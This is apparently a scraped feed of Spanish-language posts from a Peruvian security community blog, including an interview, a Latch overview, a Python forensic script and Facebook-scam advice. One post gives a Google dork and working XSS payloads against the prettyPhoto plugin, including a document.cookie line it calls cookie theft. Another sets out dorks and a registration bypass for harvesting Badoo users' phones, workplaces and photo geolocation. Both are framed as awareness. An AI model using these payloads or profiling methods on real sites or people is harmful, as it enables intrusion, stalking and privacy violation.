R: Bueno actualmente tengo 3 CCIEs y un CCDE y no voy a buscar más CCIEs. Lo que quiero apuntar ahora es sacar el nivel Arquitecto el cual es la certificación de más alto nivel, de hecho que me tomara algunos años pero pienso sacarlo.

P: ¿Me parece que para sacar esa Certificación (Arquitecto) se requiere una tesis?
R:  Más que una Tesis es que te dan un caso determinado y un tiempo para resolverlo, ya luego cuando tengas una solución debes ir a sustentarlo frente a un jurado que te califica

P: ¿Cómo ve usted la carrera de Redes y Telecomunicaciones a futuro?
R:  En general creo que es una carrera con Futuro, por ejemplo los proveedores de servicios dan más servicios de comunicaciones tenemos el Internet satelital, televisión, voz, vídeo y todos esos servicios pasan por la red de datos la red IP, entonces para quienes estudiamos esta carrera creo que hay mucho futuro.

P: Recomiendas dar el primero paso , el examen CCNA, en español o en inglés?
R:  Todo en Ingles y si no sabes ingles debes aprenderlo… Posteriormente todo estará en ingles

P: ¿En cuánto tiempo crees que IPV6 será el estándar de protocolo IP?
R: Exactamente no lo sé, pero yo creo que va tomar aún mucho tiempo. actualmente se soporta pero no se está usando del todo.

P: ¿Crees que la curricula actual de la carrera Universitaria y Técnica de Redes y Telecomunicaciones se adapta bien a las necesidades del mercado laboral?
R: Bueno yo estudie Sistemas y ahora no tengo en mente cual es la curricula de la carrera de Redes en los institutos y universidades, pero tengo entendido que hay algunas universidades que no incluyen la curricula de CCNA, en países de Centroamérica si sé que dentro de la carrera incluyen el CCNA y los egresados salen ya con conocimientos técnicos, si aquí en Perú no hay eso debería haberlo

P: ¿Te gustaría ser instructor?
R: Actualmente por el tiempo no puedo, pero en un futuro si quizás solo por unas horas.

P: A nivel sudamericano ¿Que países crees que están más desarrollados a nivel de redes?
R: Argentina y Brasil.

P: ¿Cuál es su área de redes favorita?
R: Actualmente trabajo en la parte de Core y me gusta mucho, de hecho que he tratado de ver los otros lados pero actualmente me he enfocado a core y me siento bien


P: ¿El CCDE es muy diferente a los CCIE?
R:En el CCDE debes saber ya la teoría y es muy diferente a los CCIE, aquí ya debes hacer casos. Te plantean un caso muy grande y te van haciendo preguntas sobre el caso y va cambiando de acuerdo a los requerimientos, es lo que le sigue a nivel técnico..Yo puedoconocer todos los comandos pero el diseño es lo que le sigue ver a nivel global toda la infraestructura





P: Entonces es muy importante saber diseño
R: Uno puede trabajar en Reactivo y Pro activo el reactivo es cuando atiende a un problema cuando ya sucede y aplica el troubleshooting de acuerdo a su especialidad mientras que el pro activo evita que suceda ese problema y ahí está la parte de diseño.

P: ¿Alguna recomendación para los seguidores de la comunidad?
R: Como recomendación diría que si empiezan en esto nunca paren y sigan estudiando.. si sacan un CCNA sigan adelante hasta llegar al máximo, el problema es cuando se detienen.

Muchas gracias por la entrevista Marco! esperamos tenerte nuevamente y sigas aportando a la comunidad PeruCrack

Haciendo un XSS en Plugin Prettyphoto

$
0
0
Para explicar este ejemplo de un XSS (Cross Site Scripting) vamos a tener que buscar una web que tenga el plugin prettyphoto, usada en Joomla y Wordpress es muy usado para crear Slides de imagenes, efectos, galerias.


Lo primero seria buscar una web vulnerable, lo mejor es hacerlo mediante un dork, de la siguiente manera: 

inurl:/wp-content/plugins/prettyPhoto



Y vemos que solo contando sitios wordpress cacheados hay 7300 resultados con lo que vemos la exponente vulnerabilidad a la que están expuestos.


Una vez tenemos la pagina tendremos que buscar la versión, para ello buscaremos en el código fuente la versión o miraremos los archivos Javascript o Css hasta encontrar la versión, yo lo he testeado en versiones 3.1.4 y 3.1.5 y ambas permiten la ejecución de código.





Como hemos dicho que es usado en slides y galerías localizaremos para que se esta usando el plugin y con URL /#prettyPhoto[gallery]/1 ejecutaremos la galería.

Una vez vemos que hemos conseguido ejecutar el gallery ahora vamos construir el XSS, en este primer caso usaremos un document.write para escribir en el documento texto.

URL /#prettyPhoto[gallery]/1,<a onclick="document.write(/esto-es-una-prueba/);">/


Para nosotros poder ejecutar esto es un éxito y echándole imaginación puede ser muy peligroso consiguiendo hacer Denegación de servicios, redirecciones, robo de cookies, alertas, inyección de codigo html...

Ahora vamos a por una alerta simple para conseguir el segundo XSS.

URL /#prettyPhoto[gallery]/1,<a onclick="alert(/esto-es-una-prueba/);">/



 Ahora vamos a ponernos en el sitio del atacante con lo que podría ser cosas peligrosas, lo primero seria realizar un robo de cookies, haciéndose de la siguiente manera:

URL /#prettyPhoto[gallery]/1,<a onclick="document.write(document.cookie);">/


 **La vulnerabilidad fue reportada al autor y arreglada al día siguiente, aunque pueda ser molesto para el desarrollador se suele avisar por que son vulnerabilidades que en malas manos pueden hacer mucho daño. El objetivo de este tutorial era concienciar sobre los peligros de esta vulnerabilidad y que hacer frente a ella.**

Latch un pestillo de seguridad muy interesante

$
0
0
Recientemente me interese por averiguar un poco mas sobre la herramienta publicada en Eleven Paths y revisando algunos reviews de Chema Alonso me entero que esta herramienta trae consigo muchísimas utilidades (Muchas más de las que creí) En esta publicación daré una introducción muy pequeña a esta herramienta.

¿Que es Latch?

Latch es una tecnología desarrollada por Eleven Paths que permite con un simple toque activar o desactivar tu cuenta, con lo que solo se podrá entrar cuando tengamos abierto el candado.




Podremos activar y desactivar nuestras cuentas como queramos de esta manera si alguien nos roba el movil podremos desactivar la opcion de activacion y proteger los datos, ademas se nos notificara.

Voy a explicarles el uso de esta aplicacion movil :

Como conseguirlo? Podemos descargar la aplicacion oficial en el siguiente enlace desde el Google Play




Luego tendremos la posibilidad de crear una cuenta Latch para ello vamos a la opción indicada :




Y activamos la cuenta desde el correo que nos ha llegado.

Una vez con Latch instalado y con cuenta ya podemos empezar a añadir servicios, llamado parear, por la sincronización de las cuentas.

Pareando un servicio

Es muy sencillo solo basta con introducir el código generado por Latch (Con un tiempo de vida de 60 segundos) en el campo requerido en el sitio que deseamos asociar




De momento son algunos los sitios que vienen admitiendo Latch :



Cuando se sincronice la aplicación con nuestra cuenta nos aparecerá un mensaje de confirmación en el que indica que desde ya nuestra cuenta esta listo para ser usado :




Trae un arsenal de opciones flexibles para el usuario y que viene directamente pautado con las opciones que permita la web con la que deseamos sincronizar. 


Espero personalmente que Latch crezca mucho por su gran utilidad y seguridad a la hora de manejar nuestras cuentas personales desde aquí iremos probando otras utilidades que podamos sacar provecho


Iniciando en Python : Aplicacion para Informatica Forense

$
0
0
Hace unos días me entro nuevamente el bichito de querer programar y automatizar algún proceso usando Python por lo que justo recibí el Inbox por Facebook de un amigo en el que me preguntaba sobre algunas librerias en Python que ayude en el proceso de extracción de datos de un determinado equipo para la aplicación de un análisis forense muy simple e investigando encontré unas librerias interesantes y me puse a programar un script en python capaz de extraer esta información (Y algo mas..)





Codigo :


#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import os
import platform
from PIL import ImageGrab

def guardar(algo, algomas = "<-- Info del sistema"):
     d3 = open('DatosdelSistema.doc', 'a+')
     d4 = str(algo + algomas)
     d3.writelines(d4 + """
""")
     d3.close()
print "Verificando los datos del Sistema"
d0 =  platform.uname()
da =  str(d0)
guardar(da)
print "Datos guardados"
print ""
print "Indicar la ruta de los archivos que desees listar - Indica el formato de archivos que desees listar, En blanco para listar todos"
d1 = raw_input("Ruta: ")
d2 = raw_input("Tipo de archivo: ")
for root, dirs, files in os.walk(d1):
     for item in files:
         if item.endswith(d2):
             guardar(root,item)
print "Tamando un pantallazo en 10 segundos - Minimizar todo."
time.sleep(10)
ImageGrab.grab().save("screen_capture.jpg", "JPEG")





OS: Nos permite hacer una lista de directorios
Platform: Nos permite extraer detalles y datos del sistema en el que nos encontremos






Adicional :
PIL : Nos permitira tomar las capturas de pantalla del escritorio cuando queramos Es una libreria adicional por lo que necesitaremos descargarla

Pueden descargar el codigo y probarlo, si desean modificarlo pueden hacerlo

Exprimiendo tu personalidad con Badoo (Y algo de Ingenieria Social)

$
0
0
Exprimiendo tu personalidad con Badoo (Y algo de Ingenieria Social) Recientemente vengo investigando un poco mas sobre temas de Information Gathering (Recopilación de Información) usando una de las herramientas de las cuales ya hemos hablado en ciertas publicaciones como la de Google Hacking y también la poderosa Ingeniería Social podemos darnos cuenta que se puede obtener gran cantidad de información y muchos de los usuarios de la red no son conscientes de ello. Esta informacion puede ser usada por diferentes tipos de personas desde personas con malas intenciones para hacernos algun daño hasta por investigadores o algun personal de RRHH de alguna empresa a la que queramos postular dispuesto a investigarnos por completo antes de una entrevista laboral.




Navegando por Internet y por la PlayStore de Google encontré que Badoo es una de las redes sociales mas grandes (Mas de 5,000,000 de inscritos) y ademas mas libres para conocer gente (Osea todos inicialmente desconocidos para ti) Supuse que seria un gran lugar en donde poder encontrar muchísima información.



Lo primero fue verificar el archivo robots.txt de la pagina para saber que es lo que indexa o no indexa el sitio



Como podemos ver muchos de los robots utilizados ocultan prácticamente lo mismo, sin embargo no ocultan nuestros propios perfiles haciéndolos libres para cualquier Ciberacosador con pequeños conocimientos de informática llegar hacia tu perfil y exprimir de personalidad con tan solo un teclado y un ratón. 

Inicialmente consultaremos perfiles usando algunos de los parámetros del GoogleHacking en este caso buscare perfiles de hombres/mujeres que viven en Lima Perú






Como pueden ver entre ambos tipos de búsqueda podemos obtener cerca de 800,000 resultados entre hombres y mujeres de cualquier edad y que viven en Lima, Perú. En muchos de los casos, estos son los mas peligrosos, muchos se registran con su nombre completo sin saber que con una simple búsqueda se pudo obtener toda esa información. El dork usado se basa en el formato de presentación de cada uno de los perfiles de esta popular red social."Nombre", "Genero", "Edad"  Ciudad, Pais. 




Dork Usado : 

site:badoo.com intitle:Lima, Perú intitle:Mujer

Haremos un primer ejemplo y veamos que podemos obtener ingresando al perfil de uno/a de ellos :



En este caso es una mujer de 28 años en la cual publica una sola foto sin embargo mediante el método por el que hemos ingresado podemos leer los mensajes que le dejan siendo estos públicos, vamos a enfocarnos en el primer mensaje.


Como podemos ver este mensaje es personal y solo fue enviado a la persona dueña del perfil, sin embargo podemos verla y no solo eso sino que tambien esta persona deja su numero telefonico de contacto y RPM con lo cual con un poco de Ingeniera Social se podrían obtener muchos mas datos.






Usando un poco mas de información proporcionada por el perfil de esta chica de 28 años se pueden obtener muchos mas datos.





Nos hemos adelantado y sin mayor información que la proporcionada en esta red social pudimos obtener que es de profesion enfermera y tambien donde trabaja No solo eso sino que tambien su numero telefónico y de celular. 

En este primer ejemplo pudimos ver como haciendo una búsqueda logramos obtener el perfil de una persona y pasandonos la seguridad de los mensajes internos de esta red social pudimos ver como otros perfiles de personas dejaban su información personal publicada en la red, por lo que podemos concluir que Badoo INDEXA TODO  lo que se comenta, publica, coloca, etc

Vamos mas a fondo y veamos un segundo ejemplo en esta ocasión seguimos en nuestro pais sin embargo vamos a buscar el perfil de un hombre filtramos nuestro dork para que nos muestre perfiles con nombre y apellido.







Como podemos ver al momento de ingresar al perfil nos aparecen algunas fotos ocultas lo que para poder verlas necesitamos registrarnos




Sin embargo podemos pasar esta seguridad agregando la ruta /photos en cada perfil no solo eso sino que también podemos ver los comentarios de cada uno de ellos sin estar totalmente registrados.

badoo.com/iddelperfil/photos





Podemos concluir que podemos saltar la seguridad de registro no solo para ver todas las fotos de los usuarios registrados sino también para ver los comentarios de cada uno de ellos.

Lo mas impresionante que se pudo ver es que muchas de estas fotos no borran los metadatos del todo por lo que si hemos cargado una foto con información suficiente como hora/fecha/localizacion del lugar en donde se tomo la foto puede ser muy peligroso.

Ejemplo 3 :

Creamos un perfil cualquiera y subimos una foto asegurándonos que tenga toda la metadata posible veamos como como es que se veria nuestra foto en esta popular red social




Vemos que Badoo le aplica un filtro especial a las fotos que subimos colocándole una franja con el logo de la marca vemos que pasa si analizamos el codigo fuente de nuestro falso perfil 



Podemos obtener las imágenes subidas y sin filttro con todos les meta datos cargados anteriormente 


Se han omitido algunos metodos de extracción de metadatos, sin embargo el resultado es el mismo usando la herramienta perfecta para este tipo de tareas como Foca Pro (Pueden adquirir el libro dedicado a esta herramienta en nuestra tienda) podemos obtener los metadatos de la geolocalizacion de donde fue tomada la foto.




Son muchos los perfiles que podemos encontrar en esta red social y debido a la información publicada e indexada de Badoo podemos llegar a obtener muchos mas datos de los creemos con solo el Nombre



Se podría programar un plugin incluso que automaticamente encuentre sus perfiles en otras redes sociales usando lo minimo, su nombre y edad. Aqui tenemos el perfil de esta misma chica en Facebook. Por seguridad no vamos revelar los metodos pero se sabe que trabaja en el Banco Interbank, Estudia Psicologia en una Universidad Particular de nuestro pais



Incluso se pueden obtener datos muy personales, en un enlace publicado y buscando los datos "publicos" en esta red social se obtuvo una lista publicada en un blog donde indican datos familiares de todas las generaciones de esta familia




Se pueden usar ciertos términos adicionales en la busqueda de perfiles para ser mas exactos como 
"Mi telefono es"

site:badoo.com intitle:hombre "Lima, Perú""Telefono es"



o usar muchos términos adicionales mas y darnos cuenta que todo absolutamente todo lo que publicamos en Internet de una u otra manera es publico.


En conclusión podemos ver que una red social tan grande como esta y como en muchas otras redes sociales es un peligro publicar nuestros datos personales en primer lugar porque colocamos información muy privada (Direcciones, Telefonos, Familiares, Localizaciones, etc) lo cual puede ser usada por personas mal intencionadas para chantajear, extorsionar, engañar, etc. En segundo lugar toda esta información tarde o temprano saldra a la luz pongamonos en el supuesto que un personal de RRHH se ponga a investigarnos antes de una entrevista laboral en tan solo unos minutos podría obtener muchos datos de nuestra personalidad tan solo usando como herramienta la internet, lo que a cualquier psicologo le tomaría dias.

Debemos ser conscientes de lo que se publica en internet ya que estamos exponiendo información personal muy importante, estamos exponiendo nuestras vidas.

Xander

Malware, Spam e Ingeniería Social en Facebook

$
0
0
Es sabido por todos el boom actual de las redes sociales, en especial el Facebook, en nuestras vidas por eso casi todos (Y me incluyo) tenemos una cuenta registrada en este tipo de paginas y compartimos gran cantidad de información sobre nuestras vidas (Algunos mas que otros) por lo que es un lugar de mucha concentración de cibernautas los cuales están pendientes cada minuto a que nuevas cosas se están compartiendo. 


Por esta razón este es un sitio muy atractivo para los atacantes quienes buscan cada día la manera de vulnerar una red social como Facebook quien invierte millones de dolares en su protección y no escatima  en gastos cuando de proteger su seguridad se trata, sin embargo llegamos al punto mas vulnerable de todo sistema, el ser humano.  
Veamos algunos ejemplos :



Aplicaciones novedosas en mi Facebook ( "Whatsapp para Facebook" , "1000 Emoticones para tu Facebook ", etc) :



Seguro a mas de uno se le presento alguna vez un aviso de una invitación para usar ciertas aplicaciones que por nuestra ignorancia creemos que son reales, sin embargo no se trata nada mas que de un ataque de spam combinado con iingeniera social. Ejemplos como "Whatsapp para Facebook" , "1000 Emoticones para tu Facebook ", "Hack para Candy Crush", "Mira quien visita tu perfil", etc, etc y un largo etc 




Todo comienza cuando autorizamos el uso de nuestras cuentas a la aplicación sin ni siquiera haber leído los términos y condiciones (Cosa que muchos ni lo ven) entonces en este momento autorizamos a la aplicación fraudulenta a poder publicar en nuestro nombre, le brindamos cordialmente nuestra lista de contactos, le damos permiso de enviar "inbox" a nuestros amigos , etc.




Probablemente en esta parte creamos que la aplicacion ya esta vinculada a nuestra cuenta y tratemos de acceder a la misma, sin embargo obtendremos un mensaje de error debido a que la aplicación no funciona pues no existe : 


En esta parte la supuesta aplicación ya obtuvo nuestro permiso para publicar en nuestro nombre y lo mas probable que para este punto ya lo este haciendo.. comenzara a publicar en nuestros muros / perfiles de amigos y grupos la misma publicidad en la que caímos


Alternativas de Solución a esto : 

Recomiendo verificar constantemente las aplicaciones que tienen acceso a nuestra cuenta y de encontrar alguna que no tiene nada que ver. Para ello recomiendo visitar el siguiente enlace Eliminar una aplicacion de Facebook y posteriormente si es que se trata de una falta aplicacion como la venimos viendo podremos Denunciar una aplicacion a Facebook 



Otra de las aplicaciones que están circulando por Internet son las de falsos vídeos que usando nuevamente Ingeniería Social tratan de atraer nuestra atención para caer en el engaño 



Al ingresar al video nos podrá salir un falso reproductor en donde nos pedira obligatoriamente descargar algún falso aplicativo como el Adobe Flash y otros simplemente nos redireccionaran a paginas con publicidad falta que posteriormente pueden llenar nuestro equipo de malware. Como media de solucion podemos Denunciar este tipo de paginas o a los usuarios que la promueven


Algunas de las recomendaciones que podemos dar :

  1. Mira cuál es el link del video o artículo (debajo del título).
  2. Identifica si es realmente un video o si es una imagen (trata de arrastrar el supuesto video)
  3. No des acceso a tu cuenta de Facebook para ver el video (no, no, no y no!)
  4. Si te causa mucha curiosidad, busca el video en Youtube (un sitio más seguro)
  5. Revisa si algún otro amigo publicó el mismo post/video/link con el mismo comentario sobre este.
  6. Verifica qué aplicación fue la que publicó el video (esquina inferior derecha de la noticia en Facebook)
  7. Pregúntale a la persona que compartió el video si de verdad pudo verlo.
  8. No piensen con la cabeza caliente. No se dejen llevar por impulsos o estímulos.

Saludos!

Si te hackearon tu Gmail tu recorrido diario puede ser comprometido

$
0
0
Todos sabemos de las ventajas del Google Maps a la hora de buscar algún lugar en nuestra ciudad, o al querer trazar una ruta hacia un punto que no conocemos y que el aplicativo nos indique la mejor ruta para llegar, para todo ello usamos generalmente un dispositivo del cual no nos despegamos casi nunca, Nuestro SmartPhone.




Google sabe donde estamos : 

La sincronizacion de nuestras cuentas de correo con nuestros equipos móviles (En especial los de SO Android) hace que todo lo que hagamos en nuestro equipo sea almacenado en nuestra cuenta de correo (En este caso Gmail) y nuestro recorrido diario (Con ayuda del GPS) no es la excepción





Es por eso que Google trae una opción llamada Location History pueden visitar en enlace desde su navegador y bastara con tan solo iniciar sesion en su cuenta y se visualizara por fechas todo tu recorrido durante el dia, paso a paso y trazo por trazo



Google Maps añade una función para guardar tu historial de ubicaciones a partir de un archivo KML que sólo es legible si tienes Google Earth instalado.


Cosas Buenas Cosas Malas : 

Como es bien sabido por ustedes la tecnología puede ser usada para el bien o para el mal, analizando este tipo de herramienta de Google podemos deducir que puede resultar muy util para el control parental, podemos configurar una cuenta gmail en el dispositivo de nuestros hijos y geo localizar su recorrido diario para un tema de supervision o cuidado, igualmente una empresa quien otorga este dispositivo a sus empleados pude geolocalizarlo en todas sus rutas para saber si es que cumplió o no su recorrido. Sin embargo todo esto también puede ser usado para el mal tanto por personas inescrupulosas quienes deseen cometer un acto de seguimiento paso a paso del recorrido de la persona contando tan solo con el acceso a su cuenta Gmail. Finalmente, debemos entender que depende de nosotros el uso que podamos darle a estas funcionalidades.





No quiero que me rastreen : 

Pese a todo existe la posibilidad de anular este sistema de "Geolocalizacion automatica" de Google  o en su defecto ingesar al Location History y eliminar los registros uno por uno. Para todo ello debemos tomar en cuenta lo siguiente : 

Controlar el acceso a la ubicación :
Esta configuración solo está disponible en dispositivos cuyo sistema operativo esté comprendido entre Android 4.1 y Android 4.3 o versiones inferiores. No está disponible en los dispositivos Nexus con Android 4.4.
Puedes controlar cómo las aplicaciones de Google utilizan tu ubicación con una configuración sencilla. Esta configuración solo controla las aplicaciones de Google. Si la desactivas, es posible que los servicios de Google que no sean aplicaciones y las aplicaciones que no sean de Google continúen recibiendo tu ubicación desde el dispositivo.

Cómo activar o desactivar los Informes de Ubicación mediante Ajustes de Google
Abre Ajustes de Google  desde el menú de aplicaciones de tu dispositivo.
Dispositivos con Android 4.3 o versiones inferiores: Toca Ubicación > Informes de Ubicación.
Dispositivos con Android 4.4: Toca Historial de la cuenta > Historial de Ubicaciones de Google > Informes de Ubicación.
Desliza el control para activar o desactivar la opción.
Para los dispositivos con Android 2.3-3.0, marca la casilla situada junto a "Informes de Ubicación".
Cómo activar o desactivar los Informes de Ubicación mediante el menú "Ubicación" de Ajustes de Google
Esta función está disponible en los dispositivos con Android 4.4.
Abre Ajustes de Google  desde el menú de aplicaciones de tu dispositivo.
Toca Ubicación > Informes de Ubicación de Google > Informes de Ubicación.
Desliza el control para activar o desactivar la opción.
 
Saludos!

Xander

Todos los vídeos de la RootedCON 2014

$
0
0
La RootedCON es uno de los eventos de seguridad más importantes para los hispanohablantes, es conocido por todos el gran nivel de estas ponencias. Por eso queremos compartir todo el material de estas ponencias


Una de las primeras premisas fue mantener de forma rígida el principio de neutralidad que ha caracterizado cada una de sus ediciones. En Rooted CON pudieron, pueden y podrán hablar y presentar sus ideas los miembros de la comunidad de seguridad, estudiantes, profesionales, empresas, aficionados, fuerzas del estado, hackers y, por qué no, artistas y académicos.





Otra de las premisas es evitar la censura. Mientras se ciñan a los límites de la legalidad, los contenidos no serán nunca censurados y se presentarán con la  profesionalidad y el rigor necesarios; sabemos que nuestros ponentes son profesionales serios, cuyos contenidos merecen ser tratados con todo el respeto.




Y, por supuesto, dos premisas que en realidad son una misma: promover el conocimiento técnico y asegurarnos de que, en todo momento, haya diversión y se disfrute en un ambiente de animación e intercambio.


AQUI puedes encontrar los videos todas las ponencias de la RootedCON 2014

Si quieres ver los vídeos de ponencias pasadas RootedCON 2013 y RootedCON 2012


Saludos!

Xander
Viewing all 40 articles
Browse latest View live